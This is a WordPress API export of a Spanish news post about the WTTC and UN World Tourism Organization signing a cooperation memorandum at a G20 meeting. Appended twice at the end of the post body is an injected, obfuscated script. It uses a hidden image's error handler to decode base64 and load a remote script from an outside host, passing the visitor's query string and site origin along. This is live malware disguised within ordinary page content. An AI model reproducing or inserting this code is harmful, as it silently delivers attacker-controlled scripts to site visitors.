{"id":2775,"date":"2023-06-27T09:36:02","date_gmt":"2023-06-27T12:36:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2775"},"modified":"2025-08-14T00:14:13","modified_gmt":"2025-08-14T03:14:13","slug":"el-consejo-mundial-de-viajes-y-turismo-firma-un-memorando-historico-con-la-omt","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2775","title":{"rendered":"El Consejo Mundial de Viajes y Turismo firma un memorando hist\u00f3rico con la OMT"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Las dos principales organizaciones de viajes y turismo del mundo que representan a los sectores p\u00fablico y privado mundiales acordaron trabajar juntas en una serie de objetivos clave<\/em><\/h4>\n\n\n\n<p>El Memorando de Entendimiento, firmado hoy por el Consejo Mundial de Viajes y Turismo (WTTC) y la Organizaci\u00f3n Mundial del Turismo de las Naciones Unidas (OMT) en la reuni\u00f3n ministerial del G20 (Goa, India), se centr\u00f3 en promover la cooperaci\u00f3n del sector p\u00fablico y privado en el a nivel mundial al mismo tiempo que promueve la creaci\u00f3n de empleo, el desarrollo del talento y las oportunidades comerciales en todo el mundo.<\/p>\n\n\n\n<p>Juntos, el WTTC y la OMT promover\u00e1n el turismo en las agendas mundiales y nacionales mientras trabajan para mejorar las habilidades, la innovaci\u00f3n, el esp\u00edritu empresarial y la inversi\u00f3n y la transici\u00f3n hacia un sector de viajes y turismo m\u00e1s sostenible y resistente. Las dos partes tambi\u00e9n fomentar\u00e1n el empoderamiento y la inclusi\u00f3n de la comunidad y colaborar\u00e1n en torno a la preparaci\u00f3n, gesti\u00f3n y recuperaci\u00f3n de crisis, aprovechando las lecciones aprendidas de la pandemia de COVID 19.<\/p>\n\n\n\n<p>Julia Simpson, presidenta y directora ejecutiva de WTTC, dijo: \u00abA trav\u00e9s de la firma de un nuevo MOU hist\u00f3rico, WTTC y la OMT se embarcan en un nuevo cap\u00edtulo de colaboraci\u00f3n juntos, uniendo nuestra experiencia para allanar el camino hacia un futuro pr\u00f3spero para el sector de Viajes y Turismo.<\/p>\n\n\n\n<p>\u00abJuntos, podemos crear una poderosa sinergia que dar\u00e1 forma al panorama global, abriendo las puertas a un sinf\u00edn de oportunidades y beneficiando a viajeros, empresas y destinos por igual\u00bb.<\/p>\n\n\n\n<p>Zurab Pololikashvili, Secretario General de la OMT, subray\u00f3 que \u00absolo somos m\u00e1s fuertes si trabajamos juntos para responder a los desaf\u00edos interconectados que enfrenta nuestro sector. Las s\u00f3lidas alianzas p\u00fablico-privadas son la base para transformar el turismo y generar resiliencia, y la consolidaci\u00f3n de nuestra asociaci\u00f3n con el WTTC lograr\u00e1 exactamente lo que necesitamos: unir esfuerzos para construir un futuro mejor a trav\u00e9s del turismo\u00bb.<\/p>\n\n\n\n<p>El MOU fue firmado por la presidenta y directora ejecutiva del WTTC, Julia Simpson, y el secretario general de la OMT, Zurab Pololikashvil, junto con representantes de los sectores p\u00fablico y privado.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/news-82960-el-consejo-mundial-de-viajes-y-turismo-firma-un-memorando-historico-con-la-omt\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_27-6-2023_93325_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-2776\" width=\"222\" height=\"60\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las dos principales organizaciones de viajes y turismo del mundo que representan a los sectores p\u00fablico y privado mundiales acordaron trabajar juntas en una serie de objetivos clave El Memorando de Entendimiento, firmado hoy por el Consejo Mundial de Viajes y Turismo (WTTC) y la Organizaci\u00f3n Mundial del Turismo de las Naciones Unidas (OMT) en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2777,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-2775","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2775"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2775"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2775\/revisions"}],"predecessor-version":[{"id":7046,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2775\/revisions\/7046"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2777"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2775"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}